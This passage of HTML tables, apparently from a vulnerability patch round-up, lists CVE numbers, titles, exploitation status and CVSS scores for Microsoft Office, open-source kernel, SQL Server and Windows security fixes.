Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54900">CVE-2025-54900</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55317">CVE-2025-55317</a></td><td><p>Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55243">CVE-2025-55243</a></td><td><p>Microsoft OfficePlus Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54905">CVE-2025-54905</a></td><td><p>Microsoft Word Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54901">CVE-2025-54901</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3>Open Source Software vulnerabilities</h3><p>At time of writing, Microsoft has published patches for these OSS vulnerabilities, but without providing an accompanying advisory for most of them.</p><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38714">CVE-2025-38714</a></td><td><p>hfsplus: fix slab-out-of-bounds in hfsplus_bnode_read()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38699">CVE-2025-38699</a></td><td><p>scsi: bfa: Double-free fix</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38702">CVE-2025-38702</a></td><td><p>fbdev: fix potential buffer overflow in do_register_framebuffer()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38685">CVE-2025-38685</a></td><td><p>fbdev: Fix vmalloc out-of-bounds write in fast_imageblit</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38703">CVE-2025-38703</a></td><td><p>drm/xe: Make dma-fences compliant with the safe access rules</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39730">CVE-2025-39730</a></td><td><p>NFS: Fix filehandle bounds checking in nfs_fh_to_dentry()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39683">CVE-2025-39683</a></td><td><p>tracing: Limit access to parser-&gt;buffer when trace_get_user failed</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38697">CVE-2025-38697</a></td><td><p>jfs: upper bound check of tree index in dbAllocAG</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38698">CVE-2025-38698</a></td><td><p>jfs: Regular file corruption check</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39702">CVE-2025-39702</a></td><td><p>ipv6: sr: Fix MAC comparison to be constant-time</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38688">CVE-2025-38688</a></td><td><p>iommufd: Prevent ALIGN() overflow</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39689">CVE-2025-39689</a></td><td><p>ftrace: Also allocate and copy hash for reading of filter files</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39691">CVE-2025-39691</a></td><td><p>fs/buffer: fix use-after-free when call bh_read() helper</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39732">CVE-2025-39732</a></td><td><p>wifi: ath11k: fix sleeping-in-atomic in ath11k_mac_op_set_bitrate_mask()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38718">CVE-2025-38718</a></td><td><p>sctp: linearize cloned gso packets in sctp_rcv</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38695">CVE-2025-38695</a></td><td><p>scsi: lpfc: Check for hdwq null ptr when cleaning up lpfc_vport structure</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39694">CVE-2025-39694</a></td><td><p>s390/sclp: Fix SCCB present check</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39673">CVE-2025-39673</a></td><td><p>ppp: fix race conditions in ppp_fill_forward_path</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38732">CVE-2025-38732</a></td><td><p>netfilter: nf_reject: don't leak dst refcount for loopback packets</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38684">CVE-2025-38684</a></td><td><p>net/sched: ets: use old 'nbands' while purging unused classes</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39677">CVE-2025-39677</a></td><td><p>net/sched: Fix backlog accounting in qdisc_dequeue_internal</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39703">CVE-2025-39703</a></td><td><p>net, hsr: reject HSR frame if skb can't hold tag</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39713">CVE-2025-39713</a></td><td><p>media: rainshadow-cec: fix TOCTOU race condition in rain_interrupt()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39711">CVE-2025-39711</a></td><td><p>media: ivsc: Fix crash at shutdown due to missing mei_cldev_disable() calls</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38709">CVE-2025-38709</a></td><td><p>loop: Avoid updating block size under exclusive owner</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38735">CVE-2025-38735</a></td><td><p>gve: prevent ethtool ops after shutdown</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38710">CVE-2025-38710</a></td><td><p>gfs2: Validate i_depth for exhash directories</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38701">CVE-2025-38701</a></td><td><p>ext4: do not BUG when INLINE_DATA_FL lacks system.data xattr</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38692">CVE-2025-38692</a></td><td><p>exfat: add cluster chain loop check for dir</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39721">CVE-2025-39721</a></td><td><p>crypto: qat - flush misc workqueue during device shutdown</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38729">CVE-2025-38729</a></td><td><p>ALSA: usb-audio: Validate UAC3 power domain descriptors, too</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38724">CVE-2025-38724</a></td><td><p>nfsd: handle get_client_locked() failure in nfsd4_setclientid_confirm()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39682">CVE-2025-39682</a></td><td><p>tls: fix handling of zero-length records on the rx_list</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38708">CVE-2025-38708</a></td><td><p>drbd: add missing kref_get in handle_write_conflicts</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38713">CVE-2025-38713</a></td><td><p>hfsplus: fix slab-out-of-bounds read in hfsplus_uni2asc()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38678">CVE-2025-38678</a></td><td><p>netfilter: nf_tables: reject duplicate device on updates</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-9901">CVE-2025-9901</a></td><td><p>Libsoup: improper handling of http vary header in libsoup caching</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39681">CVE-2025-39681</a></td><td><p>x86/cpu/hygon: Add missing resctrl_cpu_detect() in bsp_init helper</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39718">CVE-2025-39718</a></td><td><p>vsock/virtio: Validate length in packet header before skb_put()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39692">CVE-2025-39692</a></td><td><p>smb: server: split ksmbd_rdma_stop_listening() out of ksmbd_rdma_destroy()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38728">CVE-2025-38728</a></td><td><p>smb3: fix for slab out of bounds on mount to ksmbd</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38711">CVE-2025-38711</a></td><td><p>smb/server: avoid deadlock when linking with ReplaceIfExists</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39724">CVE-2025-39724</a></td><td><p>serial: 8250: fix panic due to PSLVERR</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39676">CVE-2025-39676</a></td><td><p>scsi: qla4xxx: Prevent a potential error pointer dereference</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39726">CVE-2025-39726</a></td><td><p>s390/ism: fix concurrency management in ism_cmd()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38704">CVE-2025-38704</a></td><td><p>rcu/nocb: Fix possible invalid rdp's-&gt;nocb_cb_kthread pointer access</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39715">CVE-2025-39715</a></td><td><p>parisc: Revise gateway LWS calls to probe user read access</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39716">CVE-2025-39716</a></td><td><p>parisc: Revise __get_user() to probe user read access</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38691">CVE-2025-38691</a></td><td><p>pNFS: Fix uninited ptr deref in block/scsi layout</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38721">CVE-2025-38721</a></td><td><p>netfilter: ctnetlink: fix refcount leak on table dump</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38725">CVE-2025-38725</a></td><td><p>net: usb: asix_devices: add phy_mask for ax88772 mdio bus</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38736">CVE-2025-38736</a></td><td><p>net: usb: asix_devices: Fix PHY address mask in MDIO bus initialization</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38717">CVE-2025-38717</a></td><td><p>net: kcm: Fix race condition in kcm_unattach()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38734">CVE-2025-38734</a></td><td><p>net/smc: fix UAF on smcsk after smc_listen_out()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38681">CVE-2025-38681</a></td><td><p>mm/ptdump: take the memory hotplug lock inside ptdump_walk_pgd()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39709">CVE-2025-39709</a></td><td><p>media: venus: protect against spurious interrupts during probe</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38679">CVE-2025-38679</a></td><td><p>media: venus: Fix OOB read due to missing payload bound check</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39714">CVE-2025-39714</a></td><td><p>media: usbtv: Lock resolution while streaming</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39720">CVE-2025-39720</a></td><td><p>ksmbd: fix refcount leak causing resource not released</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38730">CVE-2025-38730</a></td><td><p>io_uring/net: commit partial buffers on retry</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39687">CVE-2025-39687</a></td><td><p>iio: light: as73211: Ensure buffer holes are zeroed</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39719">CVE-2025-39719</a></td><td><p>iio: imu: bno055: fix OOB access of hw_xlate array</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38712">CVE-2025-38712</a></td><td><p>hfsplus: don't use BUG_ON() in hfsplus_create_attributes_file()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38715">CVE-2025-38715</a></td><td><p>hfs: fix slab-out-of-bounds in hfs_bnode_read()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38716">CVE-2025-38716</a></td><td><p>hfs: fix general protection fault in hfs_find_init()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38722">CVE-2025-38722</a></td><td><p>habanalabs: fix UAF in export_dmabuf()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38707">CVE-2025-38707</a></td><td><p>fs/ntfs3: Add sanity check for file name</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39731">CVE-2025-39731</a></td><td><p>f2fs: vm_unmap_ram() may be called from an invalid context</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39679">CVE-2025-39679</a></td><td><p>drm/nouveau/nvif: Fix potential memory leak in nvif_vmm_ctor().</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39706">CVE-2025-39706</a></td><td><p>drm/amdkfd: Destroy KFD debugfs after destroy KFD wq</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39707">CVE-2025-39707</a></td><td><p>drm/amdgpu: check if hubbub is NULL in debugfs/amdgpu_dm_capabilities</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38705">CVE-2025-38705</a></td><td><p>drm/amd/pm: fix null pointer access</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39705">CVE-2025-39705</a></td><td><p>drm/amd/display: fix a Null pointer dereference vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39693">CVE-2025-39693</a></td><td><p>drm/amd/display: Avoid a NULL pointer dereference</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39675">CVE-2025-39675</a></td><td><p>drm/amd/display: Add null pointer check in mod_hdcp_hdcp1_create_session()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39685">CVE-2025-39685</a></td><td><p>comedi: pcl726: Prevent invalid irq number</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38687">CVE-2025-38687</a></td><td><p>comedi: fix race between polling and detaching</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39686">CVE-2025-39686</a></td><td><p>comedi: Make insn_rw_emulate_bits() do insn-&gt;n samples</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39684">CVE-2025-39684</a></td><td><p>comedi: Fix use of uninitialized memory in do_insn_ioctl() and do_insnlist_ioctl()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39697">CVE-2025-39697</a></td><td><p>NFS: Fix a race when updating an existing write</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38696">CVE-2025-38696</a></td><td><p>MIPS: Don't crash in stack_top() for tasks without ABI or vDSO</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38723">CVE-2025-38723</a></td><td><p>LoongArch: BPF: Fix jump offset calculation in tailcall</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38700">CVE-2025-38700</a></td><td><p>scsi: libiscsi: Initialize iscsi_conn-&gt;dd_data only if memory is allocated</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38706">CVE-2025-38706</a></td><td><p>ASoC: core: Check for rtd == NULL in snd_soc_remove_pcm_runtime()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-7039">CVE-2025-7039</a></td><td><p>Glib: buffer under-read on glib through glib/gfileutils.c via get_tmp_file()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-38680">CVE-2025-38680</a></td><td><p>media: uvcvideo: Fix 1-byte out-of-bounds read in uvc_parse_format()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39710">CVE-2025-39710</a></td><td><p>media: venus: Add a check for packet size after reading from shared memory</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-39701">CVE-2025-39701</a></td><td><p>ACPI: pfr_update: Fix the driver update version check</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55227">CVE-2025-55227</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47997">CVE-2025-47997</a></td><td><p>Microsoft SQL Server Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21907">CVE-2024-21907</a></td><td><p>VulnCheck: CVE-2024-21907 Improper Handling of Exceptional Conditions in Newtonsoft.Json</p></td><td><p>No</p></td><td><p>Yes</p></td><td><p>N/A</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54111">CVE-2025-54111</a></td><td><p>Windows UI XAML Phone DatePickerFlyout Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54913">CVE-2025-54913</a></td><td><p>Windows UI XAML Maps MapControlSettings Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55224">CVE-2025-55224</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54092">CVE-2025-54092</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55228">CVE-2025-55228</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53800">CVE-2025-53800</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54102">CVE-2025-54102</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53801">CVE-2025-53801</a></td><td><p>Microsoft DWM Core Library Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54919">CVE-2025-54919</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53805">CVE-2025-53805</a></td><td><p>HTTP.sys Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54103">CVE-2025-54103</a></td><td><p>Windows Management Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54116">CVE-2025-54116</a></td><td><p>Windows MultiPoint Services Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55236">CVE-2025-55236</a></td><td><p>Graphics Kernel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54115">CVE-2025-54115</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53807">CVE-2025-53807</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54114">CVE-2025-54114</a></td><td><p>Windows Connected Devices Platform Service (Cdpsvc) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53802">CVE-2025-53802</a></td><td><p>Windows Bluetooth Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49734">CVE-2025-49734</a></td><td><p>PowerShell Direct Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54112">CVE-2025-54112</a></td><td><p>Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54105">CVE-2025-54105</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55223">CVE-2025-55223</a></td><td><p>DirectX Graphics Kernel Elevation of Privilege 